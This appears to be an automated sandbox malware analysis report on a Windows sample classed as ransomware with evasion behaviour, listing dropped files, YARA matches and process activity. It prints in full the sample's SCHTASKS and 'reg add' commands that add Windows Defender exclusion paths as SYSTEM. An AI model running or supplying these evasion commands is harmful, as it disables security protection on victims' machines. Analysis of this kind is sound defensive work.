Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\FOM-51[1].jpg entropy: 7.99995626102Jump to dropped file
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\5phaM8\tbcore3U.dll entropy: 7.99251721062Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\extra-task2[1].png entropy: 7.99990094954Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dsb-hr2[1].png entropy: 7.99718672167Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\ProgramData\EsnjLDMo\9eYJWFQF.dat entropy: 7.99488194619Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dsb-hr3[1].png entropy: 7.99947389782Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\ProgramData\EsnjLDMo\9eYJWFQF.png entropy: 7.99936755133Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dsb-hr1[1].png entropy: 7.99964943719Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Program Files (x86)\Z93E12i3\log.src entropy: 7.99995522615Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Program Files (x86)\Z93E12i3\tbcore3U.dll entropy: 7.99251668997Jump to dropped file
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeFile created: C:\Program Files (x86)\Z93E12i3\utils.vcxproj entropy: 7.99939945007Jump to dropped file

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.9afrYB.exe.2910000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 3.2.9afrYB.exe.2820000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Drops password protected ZIP file
Source: 9eYJWFQF.dat.39.drZip Entry: encrypted
Source: 9eYJWFQF.dat.39.drZip Entry: encrypted
Source: 9eYJWFQF.dat.39.drZip Entry: encrypted
Source: 9eYJWFQF.dat.39.drZip Entry: encrypted
PE file contains section with special chars
Source: tbcore3U.dll.6.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.6.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.6.drStatic PE information: section name: .mo:
Source: tbcore3U.dll0.6.drStatic PE information: section name: .%?.
Source: tbcore3U.dll0.6.drStatic PE information: section name: .%-[
Source: tbcore3U.dll0.6.drStatic PE information: section name: .mo:
Source: kfbe6yYK.exe.39.drStatic PE information: section name: .1Q[
Source: kfbe6yYK.exe.39.drStatic PE information: section name: .),E
Source: kfbe6yYK.exe.39.drStatic PE information: section name: .sc=
Source: tbcore3U.dll.39.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.39.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.39.drStatic PE information: section name: .mo:
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140006C95 NtAllocateVirtualMemory,3_2_0000000140006C95
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C8F92 NtdllDefWindowProc_A,52_2_004C8F92
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C6A59 NtdllDefWindowProc_A,52_2_004C6A59
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C728C NtdllDefWindowProc_A,CallWindowProcA,52_2_004C728C
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C764B wsprintfA,wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,52_2_004C764B
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C763B wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,52_2_004C763B
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00429E78: __EH_prolog,SetFileAttributesA,CreateFileA,DeviceIoControl,CloseHandle,52_2_00429E78
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,3_2_0000000140001520
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0043A30A __EH_prolog,GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,MessageBoxA,52_2_0043A30A
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_000000014000C3F03_2_000000014000C3F0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_000000014000CC003_2_000000014000CC00
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140001A303_2_0000000140001A30
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_000000014000C2A03_2_000000014000C2A0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00000001400022C03_2_00000001400022C0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00000001400110F03_2_00000001400110F0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140010CF03_2_0000000140010CF0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00000001400093003_2_0000000140009300
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_000000014000BB703_2_000000014000BB70
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140003F803_2_0000000140003F80
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00000001400103D03_2_00000001400103D0
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00007FF8BFB902483_2_00007FF8BFB90248
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_00007FF8BFB8A1B83_2_00007FF8BFB8A1B8
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCode function: 40_2_00334AE240_2_00334AE2
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCode function: 41_2_00304AE241_2_00304AE2
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCode function: 48_2_00924AE248_2_00924AE2
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010C618C51_2_010C618C
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0118E03751_2_0118E037
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0100103051_2_01001030
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0100103051_2_01001030
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010C20E251_2_010C20E2
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0106B32851_2_0106B328
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0109C2A851_2_0109C2A8
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0125C2E751_2_0125C2E7
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0106855351_2_01068553
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010B759E51_2_010B759E
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010815A351_2_010815A3
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0100C5C051_2_0100C5C0
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0106948451_2_01069484
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010D14FD51_2_010D14FD
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0108672451_2_01086724
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0108676C51_2_0108676C
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010BF7DF51_2_010BF7DF
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0105267F51_2_0105267F
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0108C6D151_2_0108C6D1
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0106582A51_2_0106582A
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0100288051_2_01002880
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010A4A5D51_2_010A4A5D
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_010D4D2951_2_010D4D29
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_01089C8C51_2_01089C8C
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0100FFCC51_2_0100FFCC
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0107EE6651_2_0107EE66
Source: C:\ProgramData\kfbe6yYK.exeCode function: 51_2_0100FEAC51_2_0100FEAC
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0049E98052_2_0049E980
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A403052_2_004A4030
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004942A052_2_004942A0
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C05E452_2_004C05E4
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A473052_2_004A4730
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0044884252_2_00448842
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004B491052_2_004B4910
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A4CE052_2_004A4CE0
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A529052_2_004A5290
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0049549052_2_00495490
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0049D7A052_2_0049D7A0
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A580052_2_004A5800
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0041DA7F52_2_0041DA7F
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00499DC052_2_00499DC0
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040609C52_2_0040609C
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A615052_2_004A6150
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0048224052_2_00482240
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040640D52_2_0040640D
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0048B08052_2_0048B080
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0048B6BD52_2_0048B6BD
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0049771052_2_00497710
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004B77E852_2_004B77E8
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004C78B152_2_004C78B1
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A399052_2_004A3990
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0048B9B252_2_0048B9B2
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0048BC1B52_2_0048BC1B
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0044BCF552_2_0044BCF5
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0048BD7B52_2_0048BD7B
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\5phaM8\5phaM8.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004AF56E appears 90 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004C5F18 appears 855 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004C2C3A appears 152 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004C50D5 appears 57 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004815F0 appears 320 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004AEF44 appears 1330 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 00476582 appears 60 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 00482C60 appears 35 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004C6033 appears 132 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004C5178 appears 42 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 00474BD8 appears 89 times
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: String function: 004AF01B appears 31 times
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: 4.2.9afrYB.exe.2910000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 3.2.9afrYB.exe.2820000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal100.rans.evad.winEXE@75/47@32/4
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0041A8DE __EH_prolog,GetLastError,FormatMessageA,LocalFree,GetTickCount,52_2_0041A8DE
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,3_2_0000000140003F80
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0043A30A __EH_prolog,GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,MessageBoxA,52_2_0043A30A
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_0040DEFA GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,52_2_0040DEFA
Source: C:\Users\user\Documents\9afrYB.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,3_2_0000000140001430
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: CreateServiceA,52_2_00405581
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_00414AF3 CoCreateInstance,lstrcpy,lstrlen,MultiByteToWideChar,52_2_00414AF3
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeCode function: 52_2_004A893C FindResourceA,LoadResource,LockResource,52_2_004A893C
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,3_2_0000000140001520
Source: C:\Users\user\Documents\9afrYB.exeCode function: 3_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,3_2_0000000140001520
Source: C:\Users\user\Documents\9afrYB.exeFile created: C:\Program Files (x86)\bmaoskJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\i[1].datJump to behavior
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:356:120:WilError_03
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5456:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Users\user\Documents\9afrYB.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_530978
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMutant created: \Sessions\1\BaseNamedObjects\CCD983BDD1F7A75AE9E2D0494FFAOLED
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeMutant created: \Sessions\1\BaseNamedObjects\8.217.59.222:8917:Sauron
Source: C:\ProgramData\EsnjLDMo\9eYJWFQF.exeFile created: C:\Users\user\AppData\Local\Temp\_ir_tu2_temp_0\
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCommand line argument: ^t40_2_00331000
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCommand line argument: tbcore3.dll40_2_00331000
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCommand line argument: tbcore3.dll40_2_00331000
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCommand line argument: tbcore3U.dll40_2_00331000
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCommand line argument: tbcore3U.dll40_2_00331000
Source: C:\Program Files (x86)\bmaosk\bmaosk.exeCommand line argument: .340_2_00332E30
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCommand line argument: ^t41_2_00301000
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCommand line argument: tbcore3.dll41_2_00301000
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCommand line argument: tbcore3.dll41_2_00301000
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCommand line argument: tbcore3U.dll41_2_00301000
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCommand line argument: tbcore3U.dll41_2_00301000
Source: C:\Program Files (x86)\Z93E12i3\5r1Aib1.exeCommand line argument: .041_2_00302E30
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCommand line argument: ^t48_2_00921000
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCommand line argument: tbcore3.dll48_2_00921000
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCommand line argument: tbcore3.dll48_2_00921000
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCommand line argument: tbcore3U.dll48_2_00921000
Source: C:\Program Files (x86)\5phaM8\5phaM8.exeCommand line argument: tbcore3U.dll48_2_00921000
Source: 2873466535874-68348745.02.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\9afrYB.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2873466535874-68348745.02.exeVirustotal: Detection: 13%
Source: C:\Users\user\Desktop\2873466535874-68348745.02.exeFile read: C:\Users\user\Desktop\2873466535874-68348745.02.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\2873466535874-68348745.02.exe "C:\Users\user\Desktop\2873466535874-68348745.02.exe"
Source: unknownProcess created: C:\Users\user\Documents\9afrYB.exe C:\Users\user\Documents\9afrYB.exe
Source: unknownProcess created: C:\Users\user\Documents\9afrYB.exe C:\Users\user\Documents\9afrYB.exe
Source: unknownProcess created: C:\Users\user\Documents\9afrYB.exe C:\Users\user\Documents\9afrYB.exe
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\9afrYB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
